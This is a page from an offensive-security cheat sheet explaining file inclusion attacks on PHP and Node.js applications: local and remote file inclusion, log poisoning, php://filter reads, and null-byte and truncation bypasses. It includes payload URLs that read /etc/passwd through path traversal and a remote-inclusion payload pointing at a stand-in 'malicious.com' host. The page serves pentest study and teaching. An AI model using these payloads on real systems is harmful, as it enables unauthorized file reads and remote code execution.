Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • PHP Local File Inclusion (LFI)
  • Log Poisoning
  • Data Exfiltration
  • Bypass Tricks
  • PHP Remote File Inclusion
  • Node.js LFI

Was this helpful?

  1. Web App Hacking
  2. Server Attacks

File Inclusion

PreviousPath TraversalNextServer-Side Template Injection

Last updated 3 years ago

Was this helpful?

File Inclusion allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. Most commonly found in PHP applications.

For example, think of file inclusion when you see:

  • page.php?file=some-file-here

  • page.php?language=eng

PHP Local File Inclusion (LFI)

For example, let's say you have the page page.php?language=en and that page includes the page.en.php file. If language=fr, then it would include page.fr.php.

Log Poisoning

If you are unable to upload PHP files to the website, you might be able to poison log files with PHP code, and then include those logs.

Data Exfiltration

LFI can be used to read files and get information from the vulnerable system.

Reading Files in Base64 Using php://

If the include statement doesn't include a prefix, and only includes your input, then you can use the php:// filter to convert files to base64 and therefore read them without issues.

Reading /proc

You can try to glean information by reading /proc. For example:

  • /proc/self/fd files

  • /proc/sched_debug

Bypass Tricks

NULL Byte Trick

Putting a null-byte in between a string might terminate the string in PHP (NULL is the string terminator in C). For example, include("shell.php\0.img") will try to include shell.php.

In URL encoding, the NULL byte is %00.

WARNING: Doesn't work since PHP 5.3.4 (though preg_ functions should still be vulnerable). If you try to do it after PHP 5.3.4, then it simply won't open anything with a null byte in it. Error message:

Failed opening 'http://www.example.com' for inclusion, when the url is ?lang=http://www.example.com%00.whatever

Truncation Trick

On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.

That truncation, combined with the fact that /etc/passwd can sometimes be the same as /etc/passwd/in PHP, means that you might be able to throw away excess characters (such as a file extension you don't want)

http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd

WARNING: There were multiple issues with this when testing locally on Apache2:

  1. Including /etc/passwd/ didn't work, even when /etc/passwd did.

  2. To try to work around issue #1, I tried to put the /etc/passwd.ext at the end. However, I was not able to get it to work with the .ext at the end (it worked without it). Just to make sure, I tried to brute force cutoff points up to 99999 character (unsuccessfully).

PHP Remote File Inclusion

Is when you can include a remote file, for example a file you're hosting. Example payload:

page.php?include=http://malicious.com/malicious.php?

Tip: The ? at the end is useful, since if the application adds a suffix to the request, then that will simply be interpreted as a GET parameter, and your malicious file will be successfully included regardless.

Node.js LFI

If a require() is at the top of a file, then it’s loaded into memory at the start of the application’s life. However, if it’s in the middle of a function, then it’s loaded every time that function is run.

So if:

  1. You have arbitrary file upload and you can upload a javascript file

  2. You control which file is loaded

Then you can cause the application to load your file and get RCE. Admittedly, this is an extremely unusual circumstance.

LFI happens when an attacker can include files on the vulnerable server (as opposed to being able to include files from remote servers). techniques can often be useful when exploiting local file inclusion vulnerabilities.

In that case, you can include the malicious.php file in the same directory with page.php?language=en/../malicious. If you had for example managed to upload a malicious.php file using , then that will result in an RCE vulnerability.

For tricks to bypass file extensions and filters, you can take a look at the repository, but note that practically all the methods there have certain limitations and caveats that aren't mentioned.

Path Traversal
unrestricted file upload
http://127.0.0.1/fileinclude.php?lang=php://filter/convert.base64-encode/resource=hello.php
payloadsallthethings
PayloadsAllTheThings/File Inclusion at master · swisskyrepo/PayloadsAllTheThingsGitHub
Logo